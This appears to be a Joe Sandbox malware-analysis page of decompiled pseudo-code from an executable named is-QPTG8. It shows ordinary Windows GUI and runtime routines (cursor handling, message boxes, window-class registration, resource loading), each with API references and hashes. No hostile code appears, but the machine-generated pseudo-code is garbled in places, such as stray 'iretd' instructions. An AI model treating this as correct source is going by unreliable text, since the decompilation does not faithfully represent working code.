				intOrPtr _t43;
				struct HWND__* _t44;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr* _t54;
				void* _t62;
				void* _t71;
				intOrPtr _t72;
				intOrPtr* _t73;
				void* _t79;

				_push(__ecx);
				_t54 = __eax;
				if( *0x48d5f8 != 0) {
					L3:
					if( *0x48d5f8 == 0) {
						_t78 =  *0x48d5fc;
						if( *0x48d5fc != 0) {
							_t43 =  *0x48d5e8; // 0x0
							_t44 = GetDesktopWindow();
							_t45 =  *0x48d5fc; // 0x0
							E00418F80(_t45, _t44, _t78, _t43);
						}
					}
					 *0x48d5f8 = 1;
					_t72 = E00413EB8(_t54, _t73);
					_t79 = _t72 -  *0x48d5d8; // 0x0
					if(_t79 != 0) {
						E00413EDC(1);
						 *0x48d5d8 = _t72;
						 *0x48d5dc =  *_t73;
						 *0x48d5ec =  *_t54;
						 *0x48d5f0 =  *((intOrPtr*)(_t54 + 4));
						E00413EDC(0);
					}
					 *0x48d5ec =  *_t54;
					 *0x48d5f0 =  *((intOrPtr*)(_t54 + 4));
					_t62 = E00413EDC(2);
					_t20 =  *0x48d5d0; // 0x0
					_t71 =  *((intOrPtr*)( *_t20 + 4))( *((intOrPtr*)(_t54 + 4)));
					if( *0x48d5fc == 0) {
						_t22 =  *0x48d62c; // 0x21d0660
						_t24 = SetCursor(E00423584(_t22, _t71));
					} else {
						if(_t72 == 0 || ( *(_t72 + 0x35) & 0x00000020) != 0) {
							_t25 =  *0x48d5fc; // 0x0
							E00418F2C(_t25, _t71);
							_t27 =  *0x48d5fc; // 0x0
							_t84 =  *((char*)(_t27 + 0x44));
							if( *((char*)(_t27 + 0x44)) != 0) {
								_t28 =  *0x48d5fc; // 0x0
								_t24 = E00419064(_t28,  *((intOrPtr*)(_t54 + 4)),  *_t54, __eflags);
							} else {
								_t30 = GetDesktopWindow();
								_t31 =  *0x48d5fc; // 0x0
								_t24 = E00418F80(_t31, _t30, _t84,  *((intOrPtr*)(_t54 + 4)));
							}
						} else {
							_t32 =  *0x48d5fc; // 0x0
							E004190D8(_t32, _t62, __eflags);
							_t34 =  *0x48d62c; // 0x21d0660
							_t24 = SetCursor(E00423584(_t34, _t71));
						}
					}
					L16:
					return _t24;
				}
				_t47 =  *0x48d5e4; // 0x0
				asm("cdq");
				if((_t47 -  *__eax ^ __edx) - __edx >= 5) {
					goto L3;
				}
				_t51 =  *0x48d5e8; // 0x0
				asm("cdq");
				_t24 = (_t51 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				if(_t24 < 5) {
					goto L16;
				}
				goto L3;
			}

0x00413f13
0x00413f14
0x00413f1d
0x00413f46
0x00413f4d
0x00413f4f
0x00413f56
0x00413f58
0x00413f5e
0x00413f6b
0x00413f70
0x00413f70
0x00413f56
0x00413f75
0x00413f85
0x00413f87
0x00413f8d
0x00413f91
0x00413f96
0x00413f9f
0x00413fa6
0x00413faf
0x00413fb7
0x00413fb7
0x00413fbe
0x00413fc7
0x00413fd8
0x00413fdc
0x00413fe6
0x00413fef
0x0041405e
0x00414069
0x00413ff1
0x00413ff3
0x00413ffd
0x00414002
0x00414007
0x0041400c
0x00414010
0x00414030
0x00414035
0x00414012
0x00414016
0x0041401f
0x00414024
0x00414024
0x0041403c
0x0041403c
0x00414041
0x00414049
0x00414054
0x00414054
0x00413ff3
0x0041406e
0x00414072
0x00414072
0x00413f1f
0x00413f26
0x00413f2e
0x00000000
0x00000000
0x00413f30
0x00413f38
0x00413f3b
0x00413f40
0x00000000
0x00000000
0x00000000

APIs

GetDesktopWindow.USER32 ref: 00413F5E
GetDesktopWindow.USER32 ref: 00414016

Part of subcall function 004190D8: 6FF0B5E0.COMCTL32(00000000,?,00414046,?,?,?,?,00413D0B,00000000,00413D1E), ref: 004190F4
Part of subcall function 004190D8: ShowCursor.USER32(00000001,00000000,?,00414046,?,?,?,?,00413D0B,00000000,00413D1E), ref: 00419111

SetCursor.USER32(00000000,?,?,?,?,00413D0B,00000000,00413D1E), ref: 00414054

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CursorDesktopWindow$Show
String ID:
API String ID: 2074268717-0
Opcode ID: 25ba4b85cec384c5701c6ab5106f769d84e60ee4a5ec3c79ad380cac1544be52
Instruction ID: e80c0aa6294f426bf32ed5d74b4b373c625defcc8174772c15f03ec99229f14a
Opcode Fuzzy Hash: 25ba4b85cec384c5701c6ab5106f769d84e60ee4a5ec3c79ad380cac1544be52
Instruction Fuzzy Hash: 32412D70A01210AFC704EF29E9D4B597BE5AB89318B14887FE905CB3A5C638EC81CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 00408C38 Relevance: 6.1, APIs: 4, Instructions: 95
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408C38(intOrPtr* __eax, void* __edx, void* __eflags) {
				char _v272;
				char _v276;
				intOrPtr _v280;
				char _v284;
				intOrPtr _v288;
				char _v292;
				intOrPtr _v296;
				char _v300;
				char* _v304;
				char _v308;
				char _v312;
				char _v568;
				char _v632;
				char _v636;
				char _v696;
				void* __edi;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t38;
				struct HINSTANCE__* _t49;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t73;
				intOrPtr* _t74;
				void* _t75;
				void* _t76;

				_t75 = __edx;
				_t74 = __eax;
				_t29 =  *0x48d014; // 0x400000
				GetModuleFileNameA(_t29,  &_v568, 0x100);
				E00407590(_t76, 0x3f, E004076D4( &_v568, 0x5c) + 1);
				_t62 = 0x408db4;
				_t73 = 0x408db4;
				if(E00402CE8(_t74, 0x406464) != 0) {
					_t62 = E00403880( *((intOrPtr*)(_t74 + 4)));
					_t61 = E004074D4(_t62, 0x408db4);
					if(_t61 != 0 &&  *((char*)(_t62 + _t61 - 1)) != 0x2e) {
						_t73 = 0x408db8;
					}
				}
				_t38 =  *0x48d014; // 0x400000
				LoadStringA(_t38, 0xff9e,  &_v632, 0x40);
				E00402BE8( *_t74,  &_v272);
				_v312 =  &_v272;
				_v308 = 4;
				_v304 =  &_v696;
				_v300 = 6;
				_v296 = E00408C2C(_t75);
				_v292 = 5;
				_v288 = _t62;
				_v284 = 6;
				_v280 = _t73;
				_v276 = 6;
				E00407AD4( &_v568,  &_v312,  &_v632, 4);
				_t49 =  *0x48d014; // 0x400000
				LoadStringA(_t49, 0xff9f,  &_v636, 0x40);
				if( *0x48d035 == 0) {
					return MessageBoxA(0,  &_v568,  &_v632, 0x2010);
				} else {
					E0040515C(0x48d208,  &_v568);
					return E00402710(E004050DF(),  &_v312,  &_v568);
				}
			}

0x00408c42
0x00408c44
0x00408c53
0x00408c59
0x00408c76
0x00408c7b
0x00408c80
0x00408c93
0x00408c9d
0x00408ca1
0x00408ca8
0x00408cb1
0x00408cb1
0x00408ca8
0x00408cc2
0x00408cc8
0x00408cd8
0x00408ce4
0x00408ceb
0x00408cf7
0x00408cfe
0x00408d0d
0x00408d14
0x00408d1c
0x00408d23
0x00408d2b
0x00408d32
0x00408d4c
0x00408d5d
0x00408d63
0x00408d6f
0x00000000
0x00408d71
0x00408d7d
0x00000000
0x00408d87

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408C59
LoadStringA.USER32 ref: 00408CC8
LoadStringA.USER32 ref: 00408D63
MessageBoxA.USER32 ref: 00408DA2

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: LoadString$FileMessageModuleName
String ID:
API String ID: 704749118-0
Opcode ID: 15eb2e37495bc9022f27dc226ecadbb96bf0e6d8232d96823ca2684057e2e750
Instruction ID: a85b8bc3062859688b3881e95ce9b71659ac63191daf16adaba85c000f202c68
Opcode Fuzzy Hash: 15eb2e37495bc9022f27dc226ecadbb96bf0e6d8232d96823ca2684057e2e750
Instruction Fuzzy Hash: 763133706093845BD760EB55C945BDF77E89F86304F00483EA6C8EB2D2DB799904876B

Uniqueness

Uniqueness Score: -1.00%

Function 00488034 Relevance: 6.1, APIs: 4, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00488034(void* __eax, intOrPtr* __edx) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				struct tagRECT _v48;
				signed int _t26;
				signed int _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t50;
				signed int _t55;
				signed int _t56;
				void* _t57;
				long _t59;
				intOrPtr _t60;
				long _t61;
				intOrPtr _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				void* _t67;

				_t67 =  &_v32;
				_t65 = __edx;
				_t50 = __eax;
				_push( *((intOrPtr*)(__eax + 0x30)));
				_push( &_v48);
				_t66 =  *((intOrPtr*)(__edx + 4));
				_t55 =  *((intOrPtr*)(__edx + 0xc)) - _t66 -  *((intOrPtr*)(__eax + 0x30));
				_t56 = _t55 >> 1;
				if(_t55 < 0) {
					asm("adc edx, 0x0");
				}
				_t57 = _t56 + _t66;
				_t64 =  *_t65;
				_t26 =  *((intOrPtr*)(_t65 + 8)) -  *_t65 -  *((intOrPtr*)(_t50 + 0x2c));
				_t27 = _t26 >> 1;
				if(_t26 < 0) {
					asm("adc eax, 0x0");
				}
				E0040AE6C(_t27 + _t64,  *((intOrPtr*)(_t50 + 0x2c)), _t57);
				E00487B14(_t67,  &(_v48.right));
				_t32 = _v32;
				_t59 = _v48.left;
				if(_t32 < _t59) {
					OffsetRect( &_v48, _t32 - _t59, 0);
				}
				_t33 = _v20;
				_t60 = _v48.bottom;
				if(_t33 < _t60) {
					OffsetRect( &_v48, 0, _t33 - _t60);
				}
				_t34 = _v32;
				_t61 = _v48.left;
				if(_t34 > _t61) {
					OffsetRect( &_v48, _t34 - _t61, 0);
				}
				_t35 = _v28;
				_t62 = _v48.top;
				if(_t35 > _t62) {
					OffsetRect( &_v48, 0, _t35 - _t62);
				}
				return E00414894(_t50, _t67);
			}

0x00488038
0x0048803b
0x0048803d
0x00488042
0x00488047
0x0048804b
0x00488050
0x00488053
0x00488055
0x00488057
0x00488057
0x0048805a
0x0048805f
0x00488063
0x00488066
0x00488068
0x0048806a
0x0048806a
0x00488072
0x0048807d
0x00488082
0x00488086
0x0048808c
0x00488098
0x00488098
0x0048809d
0x004880a1
0x004880a7
0x004880b3
0x004880b3
0x004880b8
0x004880bc
0x004880c1
0x004880cd
0x004880cd
0x004880d2
0x004880d6
0x004880dc
0x004880e8
0x004880e8
0x004880fd

APIs

OffsetRect.USER32(?,?,00000000), ref: 00488098
OffsetRect.USER32(?,00000000,?), ref: 004880B3
OffsetRect.USER32(?,?,00000000), ref: 004880CD
OffsetRect.USER32(?,00000000,?), ref: 004880E8

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: adb3ab533213fc73991d5ce9d602276681470739bd213bb028988d2f550f2f68
Instruction ID: 2cf5120d21936ad00c2a03f1069266a7bbc6929606929f9b6ec7324bdd5b9cb3
Opcode Fuzzy Hash: adb3ab533213fc73991d5ce9d602276681470739bd213bb028988d2f550f2f68
Instruction Fuzzy Hash: 39218EB67042055FC300EE69CC81E6BB7DEEBC4344F558E2AF948C724ADA34EC0887A5

Uniqueness

Uniqueness Score: -1.00%

Function 00417430 Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00417430(intOrPtr* __eax, void* __edx) {
				char _v20;
				void* _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				struct HWND__* _t26;
				intOrPtr _t28;
				intOrPtr* _t30;
				intOrPtr _t32;
				intOrPtr _t33;
				struct HICON__* _t35;
				void* _t40;
				intOrPtr* _t41;
				void* _t42;
				intOrPtr _t53;
				void* _t54;
				struct tagPOINT* _t55;

				_t54 = __edx;
				_t41 = __eax;
				if( *((intOrPtr*)(__edx + 4)) !=  *((intOrPtr*)(__eax + 0xc0))) {
					L17:
					return  *((intOrPtr*)( *_t41 - 0x10))();
				}
				_t22 =  *((intOrPtr*)(__edx + 8)) - 0xfffe;
				if(_t22 == 0) {
					if( *((short*)(__edx + 0xa)) != 0x201) {
						goto L17;
					}
					_t23 =  *0x48d628; // 0x21d2410
					if( *((intOrPtr*)(_t23 + 0x20)) == 0) {
						goto L17;
					}
					_t24 =  *0x48d628; // 0x21d2410
					_t26 = GetLastActivePopup( *(_t24 + 0x20));
					if(_t26 == GetForegroundWindow()) {
						goto L17;
					}
					_t28 =  *0x48d628; // 0x21d2410
					asm("salc");
					_t30 = _t28 - 1 + _t42;
					asm("iretd");
					 *_t30 =  *_t30 + _t30;
					return _t30;
				}
				if(_t22 != 3) {
					goto L17;
				}
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					_t32 =  *0x48d62c; // 0x21d0660
					_t53 =  *((intOrPtr*)(_t32 + 0x28));
					if(_t53 == 0) {
						GetCursorPos(_t55);
						E004149D4(_t41,  &_v20, _t55);
						_t40 = E00416AE8(_t41, 0,  &_v20);
						if(_t40 != 0) {
							_t53 =  *((intOrPtr*)(_t40 + 0x4c));
						}
						if(_t53 == 0) {
							_t53 =  *((intOrPtr*)(_t41 + 0x4c));
						}
					}
				} else {
					_t53 = 0xfffe;
				}
				if(_t53 == 0) {
					goto L17;
				} else {
					_t33 =  *0x48d62c; // 0x21d0660
					_t35 = SetCursor(E00423584(_t33, _t53));
					 *((intOrPtr*)(_t54 + 0xc)) = 1;
					return _t35;
				}
			}

0x00417436
0x00417438
0x00417443
0x00417501
0x00000000
0x00417507
0x0041744d
0x00417451
0x004174cf
0x00000000
0x00000000
0x004174d1
0x004174da
0x00000000
0x00000000
0x004174dc
0x004174e5
0x004174f3
0x00000000
0x00000000
0x004174f5
0x004174f7
0x004174f9
0x004174fc
0x004174fd
0x00000000
0x004174fd
0x00417457
0x00000000
0x00000000
0x00417461
0x00417469
0x0041746e
0x00417475
0x00417478
0x00417485
0x00417492
0x00417499
0x0041749b
0x0041749b
0x004174a2
0x004174a4
0x004174a4
0x004174a2
0x00417463
0x00417463
0x00417463
0x004174ab
0x00000000
0x004174ad
0x004174b0
0x004174bb
0x004174c0
0x00000000
0x004174c0

APIs

GetCursorPos.USER32 ref: 00417478
SetCursor.USER32(00000000), ref: 004174BB
GetLastActivePopup.USER32(?), ref: 004174E5
GetForegroundWindow.USER32(?), ref: 004174EC

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Cursor$ActiveForegroundLastPopupWindow
String ID:
API String ID: 1959210111-0
Opcode ID: ad77bc0a0dcafdd50e39233d96647bb956d683b99b121cfbc42e3892c8b1b282
Instruction ID: 5892325fd1b0cffecc4012343a44259933bd633383ba2ad9ee97e40e18a7c3e8
Opcode Fuzzy Hash: ad77bc0a0dcafdd50e39233d96647bb956d683b99b121cfbc42e3892c8b1b282
Instruction Fuzzy Hash: 2A2180317042009ACB11EF29C885ADB37F6AF44768B02496EE8499B792D73DDCC4C759

Uniqueness

Uniqueness Score: -1.00%

Function 00487DC4 Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00487DC4(intOrPtr* __eax, int __ecx, int __edx, int _a4, int _a8) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _t59;
				int _t65;
				int _t66;

				_v12 = __ecx;
				_v8 = __edx;
				_t59 = __eax;
				_t5 = _t59 + 0x24; // 0x8b500000
				_t66 = MulDiv( *_t5, _v8, _v12);
				_t8 = _t59 + 0x28; // 0x50142444
				_t65 = MulDiv( *_t8, _a8, _a4);
				if(( *(_t59 + 0x35) & 0x00000001) != 0) {
					_t17 = _t59 + 0x2c; // 0xf7d9dfe8
					_v16 =  *_t17;
				} else {
					_t14 = _t59 + 0x24; // 0x8b500000
					_t15 = _t59 + 0x2c; // 0xf7d9dfe8
					_v16 = MulDiv( *_t14 +  *_t15, _v8, _v12) - _t66;
				}
				if(( *(_t59 + 0x35) & 0x00000002) != 0) {
					_t27 = _t59 + 0x30; // 0x8bf88bff
					_v20 =  *_t27;
				} else {
					_t24 = _t59 + 0x28; // 0x50142444
					_t25 = _t59 + 0x30; // 0x8bf88bff
					_v20 = MulDiv( *_t24 +  *_t25, _a8, _a4) - _t65;
				}
				return  *((intOrPtr*)( *_t59 + 0x4c))(_v20, _v16);
			}

0x00487dcd
0x00487dd0
0x00487dd3
0x00487ddd
0x00487de6
0x00487df0
0x00487df9
0x00487dff
0x00487e1c
0x00487e1f
0x00487e01
0x00487e09
0x00487e0c
0x00487e17
0x00487e17
0x00487e26
0x00487e43
0x00487e46
0x00487e28
0x00487e30
0x00487e33
0x00487e3e
0x00487e3e
0x00487e62

APIs

MulDiv.KERNEL32(8B500000,00000000,?), ref: 00487DE1
MulDiv.KERNEL32(50142444,00000008,?), ref: 00487DF4
MulDiv.KERNEL32(F7D9DFE8,00000000,?), ref: 00487E10
MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00487E37

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c5b4e18259c2fcec0967be5015d6c9e1b7d43a1d5876a38d39f0d3f952388a1
Instruction ID: d4a06c7a7a1a84331688927c540a70fef3dc3dee16a05ca6f17a12239e028dd1
Opcode Fuzzy Hash: 0c5b4e18259c2fcec0967be5015d6c9e1b7d43a1d5876a38d39f0d3f952388a1
Instruction Fuzzy Hash: BB219AB6A04109AFCB40DFADC885E9EBBFCAF0C314B145596FA18DB346D674ED408B64

Uniqueness

Uniqueness Score: -1.00%

Function 0041F698 Relevance: 6.1, APIs: 4, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041F698(intOrPtr _a4, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				struct HINSTANCE__* _t8;
				signed int _t9;
				signed int _t11;
				struct HINSTANCE__* _t13;
				CHAR* _t14;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;

				_t5 =  *0x48d014; // 0x400000
				 *0x48c5ac = _t5;
				_t7 =  *0x48c5c0; // 0x41f688
				_t8 =  *0x48d014; // 0x400000
				_t9 = GetClassInfoA(_t8, _t7,  &_v44);
				asm("sbb eax, eax");
				_t11 =  ~( ~_t9);
				if(_t11 == 0 || L00405F44 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x48d014; // 0x400000
						_t20 =  *0x48c5c0; // 0x41f688
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA( &E0048C59C);
				}
				_t13 =  *0x48d014; // 0x400000
				_t14 =  *0x48c5c0; // 0x41f688
				_t22 = E004063FC(_t14, 0, 0x41f738, 0, _t13, 0, 0, 0, 0, 0, 0);
				SetWindowLongA(_t22, 0xfffffffc, E0041F5DC(_a4, _a8));
				return _t22;
			}

0x0041f69f
0x0041f6a4
0x0041f6ad
0x0041f6b3
0x0041f6b9
0x0041f6c0
0x0041f6c2
0x0041f6c6
0x0041f6d4
0x0041f6d6
0x0041f6dc
0x0041f6e2
0x0041f6e2
0x0041f6ec
0x0041f6ec
0x0041f6fd
0x0041f70c
0x0041f716
0x0041f727
0x0041f732

APIs

GetClassInfoA.USER32 ref: 0041F6B9
UnregisterClassA.USER32 ref: 0041F6E2
RegisterClassA.USER32 ref: 0041F6EC
SetWindowLongA.USER32 ref: 0041F727

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: c5dd2f2e5f8e2dcc20149b6101b6a9e4b46aedd7e4530def1a9c4e608d1da356
Instruction ID: 96b3f5d6125d74b1874d3b2cbe993d6107b93040b447053246e6257550f9f061
Opcode Fuzzy Hash: c5dd2f2e5f8e2dcc20149b6101b6a9e4b46aedd7e4530def1a9c4e608d1da356
Instruction Fuzzy Hash: 72014471640114ABCF10EF59DC91E9F33D8A709314F10453AB505EB2E1D635E8168B78

Uniqueness

Uniqueness Score: -1.00%

Function 0040D418 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040D418(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t30;
				void* _t31;
				struct HINSTANCE__* _t32;
				void* _t33;

				_v8 = _t24;
				_t32 = __edx;
				_t23 = __eax;
				_t30 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E0040D3A4(_t23, _t30, _t32, _t34, _t33);
				}
				_t5 = _t23 + 0x10; // 0x72756f73
				_t31 = LoadResource(_t32,  *_t5);
				 *(_t23 + 0x14) = _t31;
				_t35 = _t31;
				if(_t31 == 0) {
					E0040D3A4(_t23, _t31, _t32, _t35, _t33);
				}
				_t7 = _t23 + 0x10; // 0x72756f73
				_push(SizeofResource(_t32,  *_t7));
				_t8 = _t23 + 0x14; // 0x74536563
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E0040D12C(_t23, _t25, _t18);
			}

0x0040d41f
0x0040d422
0x0040d424
0x0040d434
0x0040d436
0x0040d439
0x0040d43b
0x0040d43e
0x0040d443
0x0040d444
0x0040d44e
0x0040d450
0x0040d453
0x0040d455
0x0040d458
0x0040d45d
0x0040d45e
0x0040d468
0x0040d469
0x0040d46d
0x0040d476
0x0040d481

APIs

FindResourceA.KERNEL32(00400000,00000000,00000000), ref: 0040D42F
LoadResource.KERNEL32(00400000,72756F73,0040ABD0,00400000,00000001,00000000,?,0040D38C,00000000,?,?,00000000,?,00471F20,0000000A,00000000), ref: 0040D449
SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040ABD0,00400000,00000001,00000000,?,0040D38C,00000000,?,?,00000000,?,00471F20), ref: 0040D463
LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040ABD0,00400000,00000001,00000000,?,0040D38C,00000000,?,?,00000000), ref: 0040D46D

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: e6100b241badeb425de31cc8584a46ace317cacf56becc7027b747929437f6c3
Instruction ID: f3587ef7c1a0537addd3ced78b3dff0677eb53373e3e491f37a1668097ee8740
Opcode Fuzzy Hash: e6100b241badeb425de31cc8584a46ace317cacf56becc7027b747929437f6c3
Instruction Fuzzy Hash: 24F062B26046046F9B04EE9D9841D6B77EDDE88264310013FF90CEB246DA39ED018779

Uniqueness

Uniqueness Score: -1.00%

Function 004019D4 Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004019D4() {
				signed int _t13;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401A8A);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x48d420);
				L00401328();
				if( *0x48d036 != 0) {
					_push(0x48d420);
					L00401330();
				}
				E00401398(0x48d440);
				E00401398(0x48d450);
				E00401398(0x48d47c);
				 *0x48d478 = LocalAlloc(0, 0xff8);
				if( *0x48d478 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x48d478; // 0x5ff888
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x48d464)) = 0x48d460;
					 *0x48d460 = 0x48d460;
					 *0x48d46c = 0x48d460;
					 *0x48d419 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401A91);
				if( *0x48d036 != 0) {
					_push(0x48d420);
					L00401338();
					return 0;
				}
				return 0;
			}

0x004019d9
0x004019da
0x004019df
0x004019e2
0x004019e5
0x004019ea
0x004019f6
0x004019f8
0x004019fd
0x004019fd
0x00401a07
0x00401a11
0x00401a1b
0x00401a2c
0x00401a38
0x00401a3a
0x00401a3f
0x00401a3f
0x00401a47
0x00401a4b
0x00401a4c
0x00401a58
0x00401a5b
0x00401a5d
0x00401a62
0x00401a62
0x00401a6b
0x00401a6e
0x00401a71
0x00401a7d
0x00401a7f
0x00401a84
0x00000000
0x00401a84
0x00401a89

APIs

RtlInitializeCriticalSection.KERNEL32(0048D420,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 004019EA
RtlEnterCriticalSection.KERNEL32(0048D420,0048D420,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 004019FD
LocalAlloc.KERNEL32(00000000,00000FF8,0048D420,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 00401A27
RtlLeaveCriticalSection.KERNEL32(0048D420,00401A91,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 00401A84

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
